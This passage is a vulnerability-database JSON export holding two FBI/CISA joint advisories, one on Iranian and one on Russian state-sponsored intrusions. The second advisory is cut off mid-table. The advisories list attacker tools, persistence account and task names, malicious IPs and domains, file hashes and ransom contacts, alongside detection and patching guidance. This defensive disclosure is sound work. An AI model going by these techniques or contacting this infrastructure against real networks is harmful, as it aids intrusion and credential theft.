{"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:29:24", "description": "### Summary\n\n_**Actions to Take Today to Protect Against Iranian State-Sponsored Malicious Cyber Activity** \n\u2022 Immediately patch software affected by the following vulnerabilities: CVE-2021-34473, 2018-13379, 2020-12812, and 2019-5591._ \n\u2022 _Implement [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._ \n_\u2022 Use [strong, unique passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>)._\n\n___**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework, version 10. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques.___\n\nThis joint cybersecurity advisory is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom\u2019s National Cyber Security Centre (NCSC) to highlight ongoing malicious cyber activity by an advanced persistent threat (APT) group that FBI, CISA, ACSC, and NCSC assess is associated with the government of Iran. FBI and CISA have observed this Iranian government-sponsored APT group exploit Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021 to gain initial access to systems in advance of follow-on operations, which include deploying ransomware. ACSC is also aware this APT group has used the same Microsoft Exchange vulnerability in Australia.\n\nThe Iranian government-sponsored APT actors are actively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations. FBI, CISA, ACSC, and NCSC assess the actors are focused on exploiting known vulnerabilities rather than targeting specific sectors. These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion.\n\nThis advisory provides observed tactics and techniques, as well as indicators of compromise (IOCs) that FBI, CISA, ACSC, and NCSC assess are likely associated with this Iranian government-sponsored APT activity.\n\nThe FBI, CISA, ACSC, and NCSC urge critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from Iranian government-sponsored cyber actors.\n\nFor a downloadable copy of IOCs, see AA21-321A.stix.\n\nFor more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Threat Actor Activity\n\nSince at least March 2021, the FBI and CISA have observed Iranian government-sponsored APT actors leverage Microsoft Exchange and Fortinet vulnerabilities to target a broad range of victims across multiple critical infrastructure sectors in furtherance of malicious activities. Observed activity includes the following.\n\n * In March 2021, the FBI and CISA observed these Iranian government-sponsored APT actors scanning devices on ports 4443, 8443, and 10443 for Fortinet FortiOS vulnerability [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), and enumerating devices for FortiOS vulnerabilities [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>) and [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>). The Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks. **Note:** for previous FBI and CISA reporting on this activity, refer to Joint Cybersecurity Advisory: [APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/media/news/2021/210402.pdf>).\n * In May 2021, these Iranian government-sponsored APT actors exploited a Fortigate appliance to access a webserver hosting the domain for a U.S. municipal government. The actors likely created an account with the username `elie` to further enable malicious activity. **Note: **for previous FBI reporting on this activity, refer to [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Initial Access for Malicious Activity](<https://www.ic3.gov/media/news/2021/210527.pdf>).\n * In June 2021, these APT actors exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children. The Iranian government-sponsored APT actors likely leveraged a server assigned to IP addresses `91.214.124[.]143` and `162.55.137[.]20`\u2014which FBI and CISA judge are associated with Iranian government cyber activity\u2014to further enable malicious activity against the hospital\u2019s network. The APT actors accessed known user accounts at the hospital from IP address `154.16.192[.]70`, which FBI and CISA judge is associated with government of Iran offensive cyber activity.\n * As of October 2021, these APT actors have leveraged a Microsoft Exchange ProxyShell vulnerability\u2014`CVE-2021-34473`\u2014to gain initial access to systems in advance of follow-on operations.\n\nACSC considers that this APT group has also used the same Microsoft Exchange vulnerability ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>)) in Australia.\n\n### MITRE ATT&amp;CK Tactics and Techniques\n\nFBI, CISA, ACSC, and NCSC assess the following tactics and techniques are associated with this activity.\n\n#### Resource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042>)]\n\nThe APT actors have used the following malicious and legitimate tools [[T1588.001](<https://attack.mitre.org/versions/v10/techniques/T1588/001>), [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>)] for a variety of tactics across the enterprise spectrum.\n\n * [Mimikatz](<https://attack.mitre.org/software/S0002>) for credential theft [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0042>)]\n * WinPEAS for privilege escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]\n * SharpWMI (Windows Management Instrumentation)\n * WinRAR for archiving collected data [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009>), [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001>)]\n * FileZilla for transferring files [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010>)]\n\n#### Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]\n\nThe Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591) [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)].\n\n#### Execution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]\n\nThe Iranian government-sponsored APT actors may have made modifications to the Task Scheduler [[T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>)]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:\n\n * `SynchronizeTimeZone`\n * `GoogleChangeManagement`\n * `MicrosoftOutLookUpdater`\n * `MicrosoftOutLookUpdateSchedule`\n\n#### Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]\n\nThe Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)]. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:\n\n * `Support`\n * `Help`\n * `elie`\n * `WADGUtilityAccount`\n\n#### Exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]\n\nThe FBI and CISA observed outbound File Transfer Protocol (FTP) transfers over port 443.\n\n#### Impact [[TA0040](<https://attack.mitre.org/versions/v10/tactics/TA0040>)]\n\nThe APT actors forced BitLocker activation on host networks to encrypt data [T1486]. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information. \n\n * sar_addr@protonmail[.]com\n * WeAreHere@secmail[.]pro\n * nosterrmann@mail[.]com\n * nosterrmann@protonmail[.]com \n\n## Detection\n\nThe FBI, CISA, ACSC, and NCSC recommend that organizations using Microsoft Exchange servers and Fortinet investigate potential suspicious activity in their networks. \n\n * Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts. **Note: **refer to Appendix A for IOCs.\n * Investigate exposed Microsoft Exchange servers (both patched and unpatched) for compromise. \n * Investigate changes to Remote Desktop Protocol (RDP), firewall, and Windows Remote Management (WinRM) configurations that may allow attackers to maintain persistent access. \n * Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.\n * Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system defined or recognized scheduled tasks for unrecognized \u201cactions\u201d (for example, review the steps each scheduled task is expected to perform).\n * Review antivirus logs for indications they were unexpectedly turned off.\n * Look for WinRAR and FileZilla in unexpected locations. \n\n**Note:** for additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom. \n\n### Mitigations\n\nThe FBI, CISA, ACSC, and NCSC urge network defenders to apply the following mitigations to reduce the risk of compromise by this threat.\n\n#### Patch and Update Systems\n\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. \n * Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.\n\n#### Evaluate and Update Blocklists and Allowlists\n\n * Regularly evaluate and update blocklists and allowlists.\n * If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization\u2019s execution blocklist. Any attempts to install or run this program and its associated files should be prevented.\n\n#### Implement and Enforce Backup and Restoration Policies and Procedures\n\n * Regularly back up data, air gap, and password protect backup copies offline.\n * Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides. \n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud). \n\n#### Implement Network Segmentation\n\n * Implement network segmentation to restrict adversary\u2019s lateral movement. \n\n#### Secure User Accounts\n\n * Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties. \n * Require administrator credentials to install software. \n\n#### Implement Multi-Factor Authentication\n\n * Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems. \n\n#### Use Strong Passwords\n\n * Require all accounts with password logins to have strong, unique passwords.\n\n#### Secure and Monitor RDP and other Potentially Risky Services\n\n * If you use RDP, restrict it to limit access to resources over internal networks.\n * Disable unused remote access/RDP ports.\n * Monitor remote access/RDP logs. \n\n#### Use Antivirus Programs\n\n * Install and regularly update antivirus and anti-malware software on all hosts. \n\n#### Secure Remote Access\n\n * Only use secure networks and avoid using public Wi-Fi networks. \n * Consider installing and using a VPN for remote access.\n\n#### Reduce Risk of Phishing\n\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails\n\n## Resources\n\n * For more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>). \n * For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.\n * The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/english>) website for more information and how to report information securely.\n * ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at [cyber.gov.au](<https://www.cyber.gov.au/>) and via 1300 292 371 (1300 CYBER1).\n\n### Appendix A: Indicators of Compromise\n\nIP addresses and executables files are listed below. For a downloadable copy of IOCs, see AA21-321A.stix.\n\nIP Addresses\n\n * `91.214.124[.]143 `\n * `162.55.137[.]20 `\n * `154.16.192[.]70`\n\n#### Executable Files \n\nExecutable files observed in this activity are identified in table 1.\n\nTable 1: Executable Files \n\n**Filename:** | MicrosoftOutLookUpdater[.]exe \n---|--- \nMD5: | 1444884faed804667d8c2bfa0d63ab13 \nSHA-1: | 95E045446EFB8C9983EBFD85E39B4BE5D92C7A2A \nSHA-256: | c51fe5073bd493c7e8d83365aace3f9911437a0f2ae80042ba01ea46b55d2624 \nSHA-512: | 6451077B99C5F8ECC5C0CA88FE272156296BEB91218B39AE28A086DBA5E7E39813F044F9AF0FEDBB260941B1CD52FA237C098CBF4B2A822F08E3E98E934D0ECF \n**Filename:** | **MicrosoftOutlookUpdater.bat** \nMD5: | 1A44368EB5BF68688BA4B4357BDC874F \nSHA-1 | FA36FEBFD5A5CA0B3A1B19005B952683A7188A13 \nSHA-256 | 3A08D0CB0FF4D95ED0896F22F4DA8755525C243C457BA6273E08453E0E3AC4C4 \nSHA-512 | 70AA89449EB5DA1D84B70D114EF9D24CB74751CE12D12C783251E51775C89FDCE61B4265B43B1D613114D6A85E9C75927B706F39C576DBB036079C7E8CAF28B2 \n**Filename:** | **MicrosoftOutlookUpdater.xml** \nMD5: | AA40C49E309959FA04B7E5AC111BB770 \nSHA-1 | F1D90E10E6E3654654E0A677763C9767C913F8F0 \nSHA-256 | 5C818FE43F05F4773AD20E0862280B0D5C66611BB12459A08442F55F148400A6 \nSHA-512 | E55A86159F2E869DCDB64FDC730DA893718E20D65A04071770BD32CAE75FF8C34704BDF9F72EF055A3B362759EDE3682B3883C4D9BCF87013076638664E8078E \n**Filename:** | **GoogleChangeManagement.xml** \nMD5: | AF2D86042602CBBDCC7F1E8EFA6423F9 \nSHA-1 | CDCD97F946B78831A9B88B0A5CD785288DC603C1 \nSHA-256 | 4C691CCD811B868D1934B4B8E9ED6D5DB85EF35504F85D860E8FD84C547EBF1D \nSHA-512 | 6473DAC67B75194DEEAEF37103BBA17936F6C16FFCD2A7345A5A46756996FAD748A97F36F8FD4BE4E1F264ECE313773CC5596099D68E71344D8135F50E5D8971 \n**Filename:** | **Connector3.exe** \nMD5: | e64064f76e59dea46a0768993697ef2f \n**Filename:** | **Audio.exe or frpc.exe** \nMD5: | b90f05b5e705e0b0cb47f51b985f84db \nSHA-1 | 5bd0690247dc1e446916800af169270f100d089b \nSHA-256: | 28332bdbfaeb8333dad5ada3c10819a1a015db9106d5e8a74beaaf03797511aa \nVhash: | 017067555d5d15541az28!z \nAuthentihash: | ed463da90504f3adb43ab82044cddab8922ba029511da9ad5a52b8c20bda65ee \nImphash: | 93a138801d9601e4c36e6274c8b9d111 \nSSDEEP: | 98304:MeOuFco2Aate8mjOaFEKC8KZ1F4ANWyJXf/X+g4:MeHFV2AatevjOaDC8KZ1xNWy93U \nNote: | \n\nIdentical to \u201cfrpc.exe\u201d available at:\n\nhttps://github[.]com/fatedier/frp/releases/download/v0.34.3/frp_0.34.3_windows_amd64.zip \n \n**Filename:** | **Frps.exe** \nMD5: | 26f330dadcdd717ef575aa5bfcdbe76a \nSHA-1 | c4160aa55d092cf916a98f3b3ee8b940f2755053 \nSHA-256: | d7982ffe09f947e5b4237c9477af73a034114af03968e3c4ce462a029f072a5a \nVhash: | 017057555d6d141az25!z \nAuthentihash: | 40ed1568fef4c5f9d03c370b2b9b06a3d0bd32caca1850f509223b3cee2225ea \nImphash: | 91802a615b3a5c4bcc05bc5f66a5b219 \nSSDEEP: | 196608:/qTLyGAlLrOt8enYfrhkhBnfY0NIPvoOQiE:GLHiLrSfY5voO \nNote: | \n\nIdentical to \u201cfrps.exe\u201d available at: \n\nhttps://github[.]com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_windows_amd64.zip \n \n### APPENDIX B: MITRE ATT&amp;CK TACTICS AND TECHNIQUES\n\nTable 2 identifies MITRE ATT&amp;CK Tactics and techniques observed in this activity.\n\nTable 2: Observed Tactics and Techniques\n\nTactic | Technique \n---|--- \nResource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042>)] | \n\nObtain Capabilities: Malware [[T1588.001](<https://attack.mitre.org/versions/v10/techniques/T1588/001>)] \n \nObtain Capabilities: Tool [[T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>)] \n \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)] | \n\nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)] \n \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]\n\n| \n\nScheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>)] \n \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)] | \n\nCreate Account: Local Account [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>)] \n \nCreate Account: Domain Account [[T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)] \nPrivilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)] | \n \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0042>)]\n\n| \nCollection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009>)] | \n\nArchive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001>)] \n \nExfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)] | \nImpact [[TA0040](<https://attack.mitre.org/versions/v10/tactics/TA0040>)] | Data Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v10/techniques/T1486>)] \n \n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>). Australian organizations can visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.\n\n### Revisions\n\nNovember 17, 2021: Initial Version|November 19, 2021: Added STIX files\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-19T12:00:00", "type": "ics", "title": "Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-19T12:00:00", "id": "AA21-321A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:33:59", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/>) framework for all referenced threat actor tactics and techniques _\n\nThis joint cybersecurity advisory\u2014written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)\u2014provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory [AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>).\n\nSince at least September 2020, a Russian state-sponsored APT actor\u2014known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting\u2014has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.\n\nThe Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:\n\n * Sensitive network configurations and passwords.\n * Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).\n * IT instructions, such as requesting password resets.\n * Vendors and purchasing information.\n * Printing access badges.\n\nTo date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.\n\nAs this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.\n\n * Click here for a PDF version of this report.\n * Click here for a STIX package of IOCs.\n\n#### U.S. Heat Map of Activity\n\n[Click here](<https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769>) for an interactive heat map of this activity (current as of November 17, 2020). Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.\n\n**Note**: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email [info@us-cert.gov](<mailto: info@us-cert.gov>). To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.\n\n**Note**: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.\n\n### Technical Details\n\nThe FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses `213.74.101[.]65`, `213.74.139[.]196`, and `212.252.30[.]170` to connect to victim web servers (_Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]).\n\nThe actor is using `213.74.101[.]65` and `213.74.139[.]196` to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (_Brute Force_ [[T1110](<https://attack.mitre.org/versions/v7/techniques/T1110>)]; _Exploit Public Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)]). The APT actor also hosted malicious domains, including possible aviation sector target `columbusairports.microsoftonline[.]host`, which resolved to `108.177.235[.]92` and `[cityname].westus2.cloudapp.azure.com`; these domains are U.S. registered and are likely SLTT government targets (_Drive-By Compromise _[[T1189](<https://attack.mitre.org/versions/v7/techniques/T1189>)]).\n\nThe APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) and a Microsoft Exchange remote code execution flaw ([CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)).\n\nThe APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability ([CVE 2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>)) (_External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133>)]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability ([CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)) for Initial Access [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] and a Windows Netlogon vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v7/tactics/TA0004/>)] within the network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]). These vulnerabilities can also be leveraged to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]) and to maintain _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v7/tactics/TA0003/>)]).\n\nBetween early February and mid-September, these APT actors used `213.74.101[.]65`, `212.252.30[.]170`, `5.196.167[.]184`, `37.139.7[.]16`, `149.56.20[.]55`, `91.227.68[.]97`, and `5.45.119[.]124` to target U.S. SLTT government networks. Successful authentications\u2014including the compromise of Microsoft Office 365 (O365) accounts\u2014have been observed on at least one victim network (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078>)]).\n\n### Mitigations\n\n#### Indicators of Compromise\n\nThe APT actor used the following IP addresses and domains to carry out its objectives:\n\n * `213.74.101[.]65`\n * `213.74.139[.]196`\n * `212.252.30[.]170`\n * `5.196.167[.]184`\n * `37.139.7[.]16`\n * `149.56.20[.]55`\n * `91.227.68[.]97`\n * `138.201.186[.]43`\n * `5.45.119[.]124`\n * `193.37.212[.]43`\n * `146.0.77[.]60`\n * `51.159.28[.]101`\n * `columbusairports.microsoftonline[.]host`\n * `microsoftonline[.]host`\n * `email.microsoftonline[.]services`\n * `microsoftonline[.]services`\n * `cityname[.]westus2.cloudapp.azure.com`\n\nIP address `51.159.28[.]101` appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address `51.159.28[.]101` (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).\n\nOrganizations should check available logs for traffic to/from IP address `51.159.28[.]101` for indications of credential-harvesting activity. As the APT actors likely have\u2014or will\u2014establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.\n\nRefer to AA20-296A.stix for a downloadable copy of IOCs.\n\n#### Network Defense-in-Depth\n\nProper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.\n\n * Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE 2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n\n| [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) | \n\n * Exim versions 4.87\u20134.91\n| [Exim page for CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| [Fortinet Security Advisory: 